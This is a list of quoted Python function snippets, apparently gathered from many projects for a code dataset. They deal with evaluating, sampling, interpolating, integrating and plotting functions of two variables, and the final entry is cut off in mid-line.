"def create_data(f, x_vals):\n y_vals = []\n for i in x_vals:\n y_vals.append(f(x_vals[i]))\n return np.array(y_vals)",
"def sample(f, *var_args):\n if len(var_args) == 1:\n return sample2d(f, var_args[0])\n elif len(var_args) == 2:\n return sample3d(f, var_args[0], var_args[1])\n else:\n raise ValueError(\"Only 2d and 3d sampling are supported at this time.\")",
"def simps_2d_py(fxy, x, y):\n\n I_simps = 0.0\n\n N = x.size\n\n h_x = (x.max() - x.min())/(N - 1)\n h_y = (y.max() - y.min())/(N - 1)\n\n S = S_simps(N)\n\n for i in range(x.size):\n\n for j in range(y.size):\n\n I_simps += 1.0/9 * h_x * h_y * S[i, j] * fxy[i, j]\n\n return I_simps",
"def sp_integrate_2D ( func ,\n xmin , xmax ,\n ymin , ymax , *args , **kwargs ) :\n from scipy import integrate\n ##\n result = integrate.dblquad ( func ,\n ymin ,\n ymax ,\n lambda x : xmin ,\n lambda x : xmax , \n *args , **kwargs )\n return result[0]",
"def get_extremum(f,\n dx=0.05, dy=0.05,\n ylims=[-2, 2], xlims=[-2, 2]):\n # generate 2 2d grids for the x & y bounds\n ymin, ymax = ylims\n xmin, xmax = xlims\n y, x = np.mgrid[slice(ymin, ymax + dy, dy),\n slice(xmin, xmax + dx, dx)]\n\n # create f(x, y)\n z = np.zeros(x.shape)\n for i in range(x.shape[0]):\n for j in range(y.shape[0]):\n xy = np.array([x[i, j], y[i, j]]).reshape(1, -1)\n z[i, j] = f(xy)\n\n return np.max(z), np.min(z)",
"def makeCrossPlotX(f,g):\n x = zerofloat(n1,n2)\n y = zerofloat(n1,n2)\n class Loop(Parallel.LoopInt):\n def compute(self,i2):\n for i1 in range(1,n1-1):\n x[i2][i1] = 0.5*(f[i2][i1+1]-f[i2][i1-1])\n y[i2][i1] = g[i2][i1]-f[i2][i1]\n Parallel.loop(n2,Loop())\n return x,y",
"def sample(self,f,N,p=100):\n return [f(x) for x in np.linspace(0,N,p)]",
"def evaluate_1darray_function_on_2d_array(function, samples, opts=None):\n num_args = get_num_args(function)\n assert samples.ndim == 2\n num_samples = samples.shape[1]\n if num_args == 2:\n values_0 = function(samples[:, 0], opts)\n else:\n values_0 = function(samples[:, 0])\n values_0 = np.atleast_1d(values_0)\n assert values_0.ndim == 1\n num_qoi = values_0.shape[0]\n values = np.empty((num_samples, num_qoi), float)\n values[0, :] = values_0\n for i in range(1, num_samples):\n if num_args == 2:\n values[i, :] = function(samples[:, i], opts)\n else:\n values[i, :] = function(samples[:, i])\n\n return values",
"def draw2 ( self ,\n dataset = None ,\n nbins = 100 ,\n silent = True ,\n in_range = None ,\n args = () , **kwargs ) :\n if in_range and isinstance ( in_range , tuple ) and 2 == len ( in_range ) :\n range_name = 'aux2_rng1_%s' % self.name \n with rooSilent ( 3 ) : \n self.xvar.setRange ( range_name , in_range[0] , in_range[1] )\n if dataset:\n dataset.get_var(self.xvar.GetName()).setRange ( range_name , in_range[0] , in_range[1] )\n\n in_range = range_name\n\n return self.draw ( drawvar = self.yvar ,\n dataset = dataset ,\n nbins = nbins ,\n ybins = 20 , ## fake\n silent = silent ,\n in_range = in_range ,\n args = args , **kwargs )",
"def interpolate_2d(x, y, z):\n X = np.linspace(min(x), max(x))\n Y = np.linspace(min(y), max(y))\n X, Y = np.meshgrid(X, Y)\n #f = interpolate.interp2d(x, y, z)\n #Z = f(X[0, :], Y[:, 0])\n f = interpolate.LinearNDInterpolator(zip(x, y), z)\n Z = f(X, Y)\n return X, Y, Z",
"def function2D(self, t):\n if t.ndim == 1:\n nX = int(self.getAttributeValue('nX'))\n nY = int(self.getAttributeValue('nY'))\n pos = t.reshape(nX, nY, 2)\n elif t.ndim == 3:\n pos = t\n X = pos[...,0]\n Y = pos[...,1]\n A = self.getParamValue(0)\n muX = self.getParamValue(1)\n muY = self.getParamValue(2)\n sigX = self.getParamValue(3)\n sigY = self.getParamValue(4)\n sigP = self.getParamValue(5)\n bg = self.getParamValue(6)\n\n sigXY = sigX*sigY*sigP\n Z = A*bivariate_normal(X,Y, sigmax=sigX, sigmay=sigY,\n mux=muX,muy=muY,sigmaxy=sigXY)\n Z += bg\n return Z",
"def plot(\n self,\n function: Callable[[float], float],\n x_range: Sequence[float] | None = None,\n use_vectorized: bool = False,\n **kwargs,\n ):\n\n t_range = np.array(self.x_range, dtype=float)\n if x_range is not None:\n t_range[: len(x_range)] = x_range\n\n if x_range is None or len(x_range) < 3:\n # if t_range has a defined step size, increase the number of sample points per tick\n t_range[2] /= self.num_sampled_graph_points_per_tick\n # For axes, the third coordinate of x_range indicates\n # tick frequency. But for functions, it indicates a\n # sample frequency\n\n graph = ParametricFunction(\n lambda t: self.coords_to_point(t, function(t)),\n t_range=t_range,\n scaling=self.x_axis.scaling,\n use_vectorized=use_vectorized,\n **kwargs,\n )\n graph.underlying_function = function\n return graph",
"def function_to_XYs(func, fpars,\n Egrid=equal_bins(100),\n domainUnit='eV', domainName='energy_in', rangeUnit='b', rangeName='crossSection',\n accuracy=upperEps):\n return XYs1dModule.XYs1d.createFromFunction(\n XYs1d.defaultAxes(labelsUnits={\n XYs1dModule.yAxisIndex: (rangeName, rangeUnit),\n XYs1dModule.xAxisIndex: (domainName, domainUnit)}),\n Xs=Egrid,\n func=func,\n parameters=fpars,\n accuracy=accuracy,\n biSectionMax=20,\n checkForRoots=False,\n infill=1,\n safeDivide=1)",
"def eval_2d_mesh(xmin, ymin, xmax, ymax, nx, ny, eval_fun):\n if xmin > xmax:\n raise ValueError(\"xmin (%.2f) was greater than\"\n \"xmax (%.2f)\" % (xmin, xmax))\n if ymin > ymax:\n raise ValueError(\"ymin (%.2f) was greater than\"\n \"ymax (%.2f)\" % (xmin, xmax))\n if nx < 1 or ny < 1:\n raise ValueError(\"nx (%.2f) or ny (%.2f) was less than 1\" % (nx, ny))\n X = np.linspace(xmin, xmax, nx)\n lenx = len(X)\n Y = np.linspace(ymin, ymax, ny)\n leny = len(Y)\n X, Y = np.meshgrid(X, Y)\n Z = np.zeros((leny, lenx))\n for i in range(leny):\n for j in range(lenx):\n Z[i][j] = eval_fun(np.array([X[i][j], Y[i][j]]))\n return (X, Y, Z)",
"def fillax(x, y, *args, **kw):\n xx = np.concatenate((x, np.array([x[-1], x[0]], x.dtype)))\n yy = np.concatenate((y, np.zeros(2, y.dtype)))\n return pylab.fill(xx, yy, *args, **kw)",
"def draw_f():\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n x_matrix = np.arange(-10, 11, 0.1)\n y_matrix = np.arange(-10, 11, 0.1)\n x_matrix, y_matrix = np.meshgrid(x_matrix, y_matrix)\n # print(x_matrix)\n u_matrix = x_matrix.copy()\n for i in range(x_matrix.shape[0]):\n for j in range(x_matrix.shape[0]):\n u_matrix[i][j] = f(x_matrix[i][j], y_matrix[i][j])\n surf = ax.plot_surface(x_matrix, y_matrix, u_matrix)\n\n plt.show()\n return surf",
"def make_plot(x,y):",
"def plot_response_surface(f, p, dims=[0,1]):\n import pylab\n if len(dims) == 1:\n xi = dims[0]\n x = pylab.linspace(-10,10,40) - p[xi]\n def value(v):\n p[xi] = v\n return f(p)\n z = [value(v) for v in x]\n pylab.plot(x,z)\n else:\n xi,yi = dims\n x = pylab.linspace(-10,10,40) - p[xi]\n y = pylab.linspace(-10,10,40) - p[yi]\n def value(pt):\n p[xi] = pt[0]\n p[yi] = pt[1]\n return f(p)\n z = np.array([[value((v,w)) for v in x] for w in y])\n pylab.pcolor(x,y,z)",
"def interp_2d(_x, _y, _x_min, _x_step, _nx, _y_min, _y_step, _ny, _ar_f, _ord=3, _ix_per=1, _ix_ofst=0):\r\n if(_ord == 1): #bi-linear interpolation based on 4 points\r\n ix0 = int(trunc((_x - _x_min)/_x_step + 1.e-09))\r\n if(ix0 < 0):\r\n ix0 = 0\r\n elif(ix0 >= _nx - 1):\r\n ix0 = _nx - 2\r\n ix1 = ix0 + 1\r\n tx = (_x - (_x_min + _x_step*ix0))/_x_step\r\n \r\n iy0 = int(trunc((_y - _y_min)/_y_step + 1.e-09))\r\n if(iy0 < 0):\r\n iy0 = 0\r\n elif(iy0 >= _ny - 1):\r\n iy0 = _ny - 2\r\n iy1 = iy0 + 1\r\n ty = (_y - (_y_min + _y_step*iy0))/_y_step\r\n\r\n nx_ix_per = _nx*_ix_per\r\n iy0_nx_ix_per = iy0*nx_ix_per\r\n iy1_nx_ix_per = iy1*nx_ix_per\r\n ix0_ix_per_p_ix_ofst = ix0*_ix_per + _ix_ofst\r\n ix1_ix_per_p_ix_ofst = ix1*_ix_per + _ix_ofst\r\n a00 = _ar_f[iy0_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f10 = _ar_f[iy0_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n f01 = _ar_f[iy1_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f11 = _ar_f[iy1_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n a10 = f10 - a00\r\n a01 = f01 - a00\r\n a11 = a00 - f01 - f10 + f11\r\n return a00 + tx*(a10 + ty*a11) + ty*a01\r\n\r\n elif(_ord == 2): #bi-quadratic interpolation based on 6 points\r\n ix0 = int(round((_x - _x_min)/_x_step))\r\n if(ix0 < 1):\r\n ix0 = 1\r\n elif(ix0 >= _nx - 1):\r\n ix0 = _nx - 2\r\n ixm1 = ix0 - 1\r\n ix1 = ix0 + 1\r\n tx = (_x - (_x_min + _x_step*ix0))/_x_step\r\n\r\n iy0 = int(round((_y - _y_min)/_y_step))\r\n if(iy0 < 1):\r\n iy0 = 1\r\n elif(iy0 >= _ny - 1):\r\n iy0 = _ny - 2\r\n iym1 = iy0 - 1\r\n iy1 = iy0 + 1\r\n ty = (_y - (_y_min + _y_step*iy0))/_y_step\r\n\r\n nx_ix_per = _nx*_ix_per\r\n iym1_nx_ix_per = iym1*nx_ix_per\r\n iy0_nx_ix_per = iy0*nx_ix_per\r\n iy1_nx_ix_per = iy1*nx_ix_per\r\n ixm1_ix_per_p_ix_ofst = ixm1*_ix_per + _ix_ofst\r\n ix0_ix_per_p_ix_ofst = ix0*_ix_per + _ix_ofst\r\n ix1_ix_per_p_ix_ofst = ix1*_ix_per + _ix_ofst\r\n fm10 = _ar_f[iy0_nx_ix_per + ixm1_ix_per_p_ix_ofst]\r\n a00 = _ar_f[iy0_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f10 = _ar_f[iy0_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n f0m1 = _ar_f[iym1_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f01 = _ar_f[iy1_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f11 = _ar_f[iy1_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n a10 = 0.5*(f10 - fm10)\r\n a01 = 0.5*(f01 - f0m1)\r\n a11 = a00 - f01 - f10 + f11\r\n a20 = 0.5*(f10 + fm10) - a00\r\n a02 = 0.5*(f01 + f0m1) - a00\r\n return a00 + tx*(a10 + tx*a20 + ty*a11) + ty*(a01 + ty*a02)\r\n \r\n elif(_ord == 3): #bi-cubic interpolation based on 12 points\r\n ix0 = int(trunc((_x - _x_min)/_x_step + 1.e-09))\r\n if(ix0 < 1):\r\n ix0 = 1\r\n elif(ix0 >= _nx - 2):\r\n ix0 = _nx - 3\r\n ixm1 = ix0 - 1\r\n ix1 = ix0 + 1\r\n ix2 = ix0 + 2\r\n tx = (_x - (_x_min + _x_step*ix0))/_x_step\r\n\r\n iy0 = int(trunc((_y - _y_min)/_y_step + 1.e-09))\r\n if(iy0 < 1):\r\n iy0 = 1\r\n elif(iy0 >= _ny - 2):\r\n iy0 = _ny - 3\r\n iym1 = iy0 - 1\r\n iy1 = iy0 + 1\r\n iy2 = iy0 + 2\r\n ty = (_y - (_y_min + _y_step*iy0))/_y_step\r\n\r\n nx_ix_per = _nx*_ix_per\r\n iym1_nx_ix_per = iym1*nx_ix_per\r\n iy0_nx_ix_per = iy0*nx_ix_per\r\n iy1_nx_ix_per = iy1*nx_ix_per\r\n iy2_nx_ix_per = iy2*nx_ix_per\r\n ixm1_ix_per_p_ix_ofst = ixm1*_ix_per + _ix_ofst\r\n ix0_ix_per_p_ix_ofst = ix0*_ix_per + _ix_ofst\r\n ix1_ix_per_p_ix_ofst = ix1*_ix_per + _ix_ofst\r\n ix2_ix_per_p_ix_ofst = ix2*_ix_per + _ix_ofst\r\n f0m1 = _ar_f[iym1_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f1m1 = _ar_f[iym1_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n fm10 = _ar_f[iy0_nx_ix_per + ixm1_ix_per_p_ix_ofst]\r\n a00 = _ar_f[iy0_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f10 = _ar_f[iy0_nx_ix_per + 
ix1_ix_per_p_ix_ofst]\r\n f20 = _ar_f[iy0_nx_ix_per + ix2_ix_per_p_ix_ofst]\r\n fm11 = _ar_f[iy1_nx_ix_per + ixm1_ix_per_p_ix_ofst]\r\n f01 = _ar_f[iy1_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f11 = _ar_f[iy1_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n f21 = _ar_f[iy1_nx_ix_per + ix2_ix_per_p_ix_ofst]\r\n f02 = _ar_f[iy2_nx_ix_per + ix0_ix_per_p_ix_ofst]\r\n f12 = _ar_f[iy2_nx_ix_per + ix1_ix_per_p_ix_ofst]\r\n a10 = -0.5*a00 + f10 - f20/6 - fm10/3\r\n a01 = -0.5*a00 + f01 - f02/6 - f0m1/3\r\n a11 = -0.5*(f01 + f10) + (f02 - f12 + f20 - f21)/6 + (f0m1 - f1m1 + fm10 - fm11)/3 + f11\r\n a20 = -a00 + 0.5*(f10 + fm10)\r\n a02 = -a00 + 0.5*(f01 + f0m1)\r\n a21 = a00 - f01 + 0.5*(f11 - f10 - fm10 + fm11)\r\n a12 = a00 - f10 + 0.5*(f11 - f01 - f0m1 + f1m1)\r\n a30 = 0.5*(a00 - f10) + (f20 - fm10)/6\r\n a03 = 0.5*(a00 - f01) + (f02 - f0m1)/6\r\n a31 = 0.5*(f01 + f10 - f11 - a00) + (f21 + fm10 - f20 - fm11)/6\r\n a13 = 0.5*(f10 - f11 - a00 + f01) + (f0m1 + f12 - f02 - f1m1)/6\r\n return a00 + tx*(a10 + tx*(a20 + tx*(a30 + ty*a31) + ty*a21) + ty*a11) + ty*(a01 + ty*(a02 + ty*(a03 + tx*a13) + tx*a12))\r\n return 0",
"def apply_se_corr2D(x, y, lx, f):\n if( x.shape != y.shape or x.shape != f.shape):\n print (x.shape)\n print (y.shape)\n print (f.shape)\n raise ValueError(\"Incompatible shape of coordinates arrays\")\n #\n nx = x.shape[0]\n ny = x.shape[1]\n #\n g = np.zeros_like(f)\n two_lx2 = 2.0*lx*lx\n #\n for i in range(nx):\n for j in range(ny):\n coef_sum = 0\n for k1 in range(nx):\n for k2 in range(ny):\n dx = x[k1,k2] - x[i,j]\n dy = y[k1,k2] - y[i,j]\n coef = np.exp( -(dx*dx+dy*dy)/two_lx2 )\n g[i,j] = g[i,j] + coef*f[k1,k2]\n coef_sum = coef_sum + coef\n pass # k2\n pass #k1\n # Normalization if needed\n g[i,j] = g[i,j]/coef_sum\n pass # j\n pass # i\n return g",
"def Generate_Custom(f, n, m):\n return np.fromfunction(np.vectorize(f, otypes=[float]), (n,m))",
"def function_to_surface (x, y, func, hist=False):\n dx = x[1] - x[0]\n dy = y[1] - y[0]\n xbins = np.r_[x - dx/2., x[-1] + dx/2.]\n ybins = np.r_[y - dy/2., y[-1] + dy/2.]\n values = np.vectorize (func) (*np.meshgrid (x, y)).T\n if hist:\n return Hist2D (xbins, ybins, values)\n else:\n return Surface2D (xbins, ybins, values)",
"def evaluate_random_function(f, x, y):\n\n # your code goes here",
"def evaluate_random_function(f, x, y):\n if (f[0]=='x'):\n return X(x,y)\n elif (f[0]=='y'):\n return Y(x,y)\n elif (f[0]=='sin_pi'):\n return sin_pi(evaluate_random_function(f[1],x,y))\n elif (f[0]=='cos_pi'):\n return cos_pi(evaluate_random_function(f[1],x,y))\n elif (f[0]=='times'):\n return times(evaluate_random_function(f[1],x,y),evaluate_random_function(f[2],x,y))\n elif (f[0]=='root'):\n return root(evaluate_random_function(f[1],x,y))\n elif (f[0]=='square'):\n return square(evaluate_random_function(f[1],x,y))",
"def monte_carlo_sample(f, bounds, n_samples):\r\n samples = []\r\n pmax = f(bounds[0])\r\n tries_per_run = int(n_samples*1/pmax)\r\n while len(samples) < n_samples:\r\n x = np.random.rand(tries_per_run)*(bounds[1]-bounds[0])+bounds[0]\r\n y = np.random.rand(tries_per_run)*pmax\r\n good = x[y <= f(x)]\r\n samples = samples + [i for i in x[y <= f(x)]]\r\n return np.array(np.array(samples))[:n_samples]",
"def create_derivative_graph(f, xrange, n):\n plot_points = []\n for x in xrange:\n plot_points.append(nth_derivative(f, x, n))\n return plot_points",
"def draw1 ( self ,\n dataset = None ,\n nbins = 100 ,\n silent = True ,\n in_range = None ,\n args = () , **kwargs ) :\n if in_range and isinstance ( in_range , tuple ) and 2 == len ( in_range ) :\n range_name = 'aux2_rng2_%s' % self.name \n with rooSilent ( 3 ) : \n self.yvar.setRange ( range_name , in_range[0] , in_range[1] )\n if dataset:\n dataset.get_var(self.yvar.GetName()).setRange ( range_name , in_range[0] , in_range[1] )\n\n in_range = range_name \n\n return self.draw ( drawvar = self.xvar , \n dataset = dataset ,\n nbins = nbins ,\n ybins = 20 , ## fake \n silent = silent ,\n in_range = in_range ,\n args = args , **kwargs )",
"def sampleFunction(x: int, y: float) -> float:\n return x * y",
"def plot(f,**kw):\n if type(f)==tuple:\n x,y=f\n pl.plot(x,y,**kw)\n else:\n pl.plot(f,**kw)",
"def d_func(x, y):\n return np.array((2.0 * (x - 1) - 400.0 * x * (y - x**2), 200.0 * (y - x**2)))",
"def l2_dist_list(list_func, range_x, func_ref = None):\n if(func_ref is None):\n func_ref = list_func[0]\n \n l2_dists = [pFunc_base.square_dist(func_ref, f) for f in list_func] \n return l2_dists",
"def f(x, y):\n return Ripple.g(np.sqrt(x ** 2 + y ** 2))",
"def vis_data(data, f1,f2):\n hist = np.histogram2d(data[:, f2], data[:, f1], bins=100, range=[lims, lims])\n plt.pcolormesh(hist[1], hist[2], hist[0], alpha=0.5)",
"def filt2(X, yvals, xvals, ny, nx):\n\n Y = dofilter2(X,nx,ny)\n \n Xnew = dofilter2(X,nx%2,ny%2)\n xvalsnew = dofilter2(xvals,ny%2,nx%2)\n yvalsnew = dofilter2(yvals,ny%2,nx%2)\n\n return Xnew, Y, yvalsnew, xvalsnew",
"def eulers_method(f, y, dx, range):\n x = min(range)\n y_space = [y]\n x_space = [x]\n while x<=max(range):\n y += f(x, y)*dx\n x += dx\n x_space.append(x)\n y_space.append(y)\n return (x_space, y_space)",
"def makeCrossPlot(f,g):\n s = fillfloat(shiftDrv,n1,n2)\n fs = applyShifts(f,s)\n gs = applyShifts(g,s)\n x = zerofloat(n1,n2)\n y = zerofloat(n1,n2)\n class Loop(Parallel.LoopInt):\n def compute(self,i2):\n for i1 in range(n1):\n x[i2][i1] = 0.5*(fs[i2][i1]+gs[i2][i1])-0.5*(f[i2][i1]+g[i2][i1])\n y[i2][i1] = g[i2][i1]-f[i2][i1]\n Parallel.loop(n2,Loop())\n return x,y",
"def brute(f, ranges, args=(), Ns=3, full_output=False):\n # Generate the parameter space\n lrange = list(ranges)\n N = len(ranges)\n for k in range(N):\n low, high = lrange[k]\n lrange[k] = np.linspace(low, high, Ns)\n xs = np.array(np.meshgrid(*lrange)).T.reshape(-1, N)\n return find_fmin_on_grid(f, xs, args, full_output)",
"def plot_functions(phi_orthonormalized_list, start_index, interval):\n\n # Run plot settings\n plot_settings()\n\n # Axis\n t_array = numpy.logspace(-7, numpy.log10(interval[1]), 1000)\n\n # Evaluate functions\n num_functions = len(phi_orthonormalized_list)\n\n f = numpy.zeros((num_functions, t_array.size), dtype=float)\n for j in range(num_functions):\n f_lambdify = sympy.lambdify(t, phi_orthonormalized_list[j], 'numpy')\n f[j, :] = f_lambdify(t_array)\n\n # Plot\n fig, ax = plt.subplots(figsize=(7, 4.8))\n for j in range(num_functions):\n ax.semilogx(t_array, f[j, :],\n label=r'$i = %d$' % (j+start_index))\n\n ax.legend(ncol=3, loc='lower left', borderpad=0.5, frameon=False)\n ax.set_xlim([t_array[0], t_array[-1]])\n ax.set_ylim([-1, 1])\n ax.set_yticks([-1, 0, 1])\n ax.set_xlabel(r'$t$')\n ax.set_ylabel(r'$\\phi_i^{\\perp}(t)$')\n ax.set_title('Orthogonalized inverse-monomial functions')\n ax.grid(axis='y')\n\n # Get the root directory of the package (parent directory of this script)\n file_dir = os.path.dirname(os.path.realpath(__file__))\n parent_dir = os.path.dirname(file_dir)\n second_parent_dir = os.path.dirname(parent_dir)\n\n # Try to save in the docs/images directory. Check if exists and writable\n save_dir = os.path.join(second_parent_dir, 'docs', 'images')\n if (not os.path.isdir(save_dir)) or (not os.access(save_dir, os.W_OK)):\n\n # Write in the current working directory\n save_dir = os.getcwd()\n\n # Save plot in both svg and pdf format\n if os.access(save_dir, os.W_OK):\n save_fullename_svg = os.path.join(save_dir, 'orthogonal_functions.svg')\n save_fullename_pdf = os.path.join(save_dir, 'orthogonal_functions.pdf')\n plt.savefig(save_fullename_svg, transparent=True, bbox_inches='tight')\n plt.savefig(save_fullename_pdf, transparent=True, bbox_inches='tight')\n print('')\n print('Plot saved to \"%s\".' % (save_fullename_svg))\n print('Plot saved to \"%s\".' % (save_fullename_pdf))\n else:\n print('Cannot save plot to %s. Directory is not writable.' % save_dir)\n\n # If no display backend is enabled, do not plot in the interactive mode\n if matplotlib.get_backend() != 'agg':\n plt.show()",
"def _estimate_inverse_function(f, samples, f_domain=None, endpoints=None):\n if f_domain is None:\n f_domain = f.domain\n xs = np.linspace(*f_domain, samples)\n ys = [f(x) for x in xs]\n if endpoints is not None:\n fa, fb = endpoints\n if fa is not None:\n ys[0] = fa\n if fb is not None:\n ys[-1] = fb\n ys, xs = _filter_nonmonotone_data_points(ys, xs)\n if ys[0] > ys[-1]: # reversed order\n ys = list(reversed(ys))\n xs = list(reversed(xs))\n # PchipInterpolator guarantees monotonicity of interpolant\n interp = PchipInterpolator(ys, xs, extrapolate=True)\n return interp",
"def evaluate_random_function(f, x, y):\n elementary_func = ['prod', 'avg', 'cos_pi', 'sin_pi', 'square', 'root']\n if f[0] == \"x\":\n return x\n elif f[0] == \"y\":\n return y\n\n # Kindof effort instensive way to do this, but it allows for a\n # changeable list of functions with less effort\n else:\n if f[0] == elementary_func[0]:\n first_argument = evaluate_random_function(f[1], x, y)\n second_argument = evaluate_random_function(f[2], x, y)\n return first_argument * second_argument\n elif f[0] == elementary_func[1]:\n first_argument = evaluate_random_function(f[1], x, y)\n second_argument = evaluate_random_function(f[2], x, y)\n return .5*(first_argument + second_argument)\n elif f[0] == elementary_func[2]:\n argument = evaluate_random_function(f[1], x, y)\n ans = math.cos(math.pi * argument)\n return ans\n elif f[0] == elementary_func[3]:\n argument = evaluate_random_function(f[1], x, y)\n ans = math.sin(math.pi * argument)\n return ans\n elif f[0] == elementary_func[4]:\n argument = evaluate_random_function(f[1], x, y)\n return argument**2\n elif f[0] == elementary_func[5]:\n argument = evaluate_random_function(f[1], x, y)\n return math.sqrt(math.fabs(argument))",
"def test_linear_interpolation_range(self):\n\n for x in [[1.0, 2.0, 4.0], [-20, -19, 0], numpy.arange(200) + 1000]:\n for y in [[5.0, 9.0], [100, 200, 10000]]:\n\n # Define ny by nx array with corresponding values\n A = numpy.zeros((len(x), len(y)))\n\n # Define values for each x, y pair as a linear function\n for i in range(len(x)):\n for j in range(len(y)):\n A[i, j] = linear_function(x[i], y[j])\n\n # Test that linearly interpolated points are correct\n xis = numpy.linspace(x[0], x[-1], 100)\n etas = numpy.linspace(y[0], y[-1], 100)\n points = combine_coordinates(xis, etas)\n\n vals = interpolate2d(x, y, A, points, mode='linear')\n refs = linear_function(points[:, 0], points[:, 1])\n assert numpy.allclose(vals, refs, rtol=1e-12, atol=1e-12)",
"def compute_2pcf_2D(xs, ys, bins=10):\n # seps has shape (N, N) up to ind\n # calculate the euclidean separation between each point in the process\n seps = distance_map(xs, xs)\n\n # pps0, pps1 have shape (N, N) up to ind\n # calculate the pair products of each component of each point of the process\n pps = product_map(ys, ys)\n pps0 = pps[:,:,0]\n pps1 = pps[:,:,1]\n\n # ``upper triangle`` indices for an (N, N) array\n ind = np.triu_indices(seps.shape[0])\n\n # Use histograms to efficiently select pps according to sep\n # Inspired by Gary Bernstein via Pierre-Francois Leget\n counts, dr = np.histogram(seps[ind], bins=bins)\n xi0, _ = np.histogram(seps[ind], bins=bins, weights=pps0[ind])\n xi1, _ = np.histogram(seps[ind], bins=bins, weights=pps1[ind])\n\n # Normalize quantities\n dr = 0.5*(dr[:-1]+dr[1:])\n xi0 /= counts\n xi1 /= counts\n\n return dr, xi0, xi1",
"def f(x):\n n_particles = x.shape[0]\n j = [f_per_particle(x[i]) for i in range(n_particles)]\n #print(\"f j: \", j)\n return np.array(j)",
"def sampler(xaxis, yaxis, vals, x, y):\n i = 0\n while xaxis[i] < x:\n i += 1\n j = 0\n while yaxis[j] < y:\n j += 1\n return vals[i, j]",
"def monte_carlos(f, ranges, args=(), Ns=1000, full_output=False):\n # Generate the parameter space\n np.random.seed(17)\n lrange = list(ranges)\n N = len(ranges)\n xs = np.zeros((Ns, N))\n for k in range(N):\n low, high = lrange[k]\n xs[:, k] = np.random.uniform(low, high, Ns)\n return find_fmin_on_grid(f, xs, args, full_output)",
"def f(x):\r\n return x * np.sin(x)",
"def plot_multidimensional_function_slices(\n func: Callable[[np.ndarray], NDAorTuple],\n slice_loc: np.ndarray,\n bounds: Union[np.ndarray, List[Tuple[float, float]]],\n input_names: Optional[List[str]] = None,\n obs_points: Optional[Union[np.ndarray, List[np.ndarray]]] = None,\n input_scales: Optional[List[PLOT_SCALE]] = None,\n output_scale: PLOT_SCALE = \"linear\",\n output_label: str = \"Objective Value\",\n size: float = 3,\n slice_2d_resolution: int = 50,\n # slide_1d_resolution: int = 100,\n func_returns_confidence_intervals: bool = False,\n) -> Tuple[plt.Figure, np.ndarray]:\n # Input validation checks\n assert output_scale in [\"linear\", \"log\", \"symlog\"]\n\n def func_return_just_mean(x):\n \"\"\"\n If the supplied function is a predictor returning lower and upper confidence bounds as well as mean,\n return just the mean prediction. If not, return the function value evaluated at x.\n \"\"\"\n return func(x)[0] if func_returns_confidence_intervals else func(x)\n\n n_dims: int = len(bounds)\n # If multiple batches of points supplied as a list in obs_points, make a colour palette\n n_batches = len(obs_points) if isinstance(obs_points, (list, tuple)) else 1\n scatter_colours = sns.color_palette(\"viridis\", n_colors=n_batches)\n # If input_scales not specified, default all to 'linear'\n input_scales = input_scales if input_scales else [\"linear\"] * n_dims # type: ignore # auto\n # Keep track of contour sets returned for each axis\n contour_sets = []\n\n # Construct axes\n fig = plt.figure(figsize=(size * n_dims, size * n_dims))\n axes, cbar_axes = make_lower_triangular_axis_grid_with_colorbar_axes(\n fig=fig, num_cols=n_dims, num_colorbars=2, share_y_on_diagonal=True\n )\n\n # Keep a running minimum and maximum of function values in 2D slices\n func_values_min: float = np.inf\n func_values_max: float = -np.inf\n\n with sns.axes_style(\"darkgrid\"):\n for i in range(n_dims): # i iterates over the rows of the plots\n for j in range(n_dims): # j iterates over the columns of the plots\n ax = axes[i, j]\n # 1D-slice plots along the diagonal\n if i == j:\n if func_returns_confidence_intervals:\n plot_1d_slice_through_function_with_confidence_intervals(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n else:\n plot_1d_slice_through_function(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n ax.set_yscale(output_scale)\n\n # lower triangle\n elif i > j:\n dim_x, dim_y = j, i\n # Compute the data for the 2D slice plots\n xx, yy, func_values_slice = calc_2d_slice(\n func=func_return_just_mean, # type: ignore # auto\n dim_x=dim_x,\n dim_y=dim_y,\n slice_loc=slice_loc,\n slice_bounds_x=bounds[dim_x],\n slice_bounds_y=bounds[dim_y],\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n resolution=slice_2d_resolution,\n )\n # Plot the 2D slice\n _, im = plot_2d_slice_from_arrays(\n xx,\n yy,\n func_values_slice,\n ax=ax,\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n output_scale=output_scale,\n )\n contour_sets.append(im)\n # Keep a running minimum and maximum of function values in slices\n func_values_min = min(func_values_min, func_values_slice.min()) # type: ignore\n func_values_max = max(func_values_max, func_values_slice.max()) # type: ignore\n # Scatter points on the slices if given\n if obs_points is not None: # pragma: no cover\n if isinstance(obs_points, np.ndarray):\n # If just one array given, scatter with the 
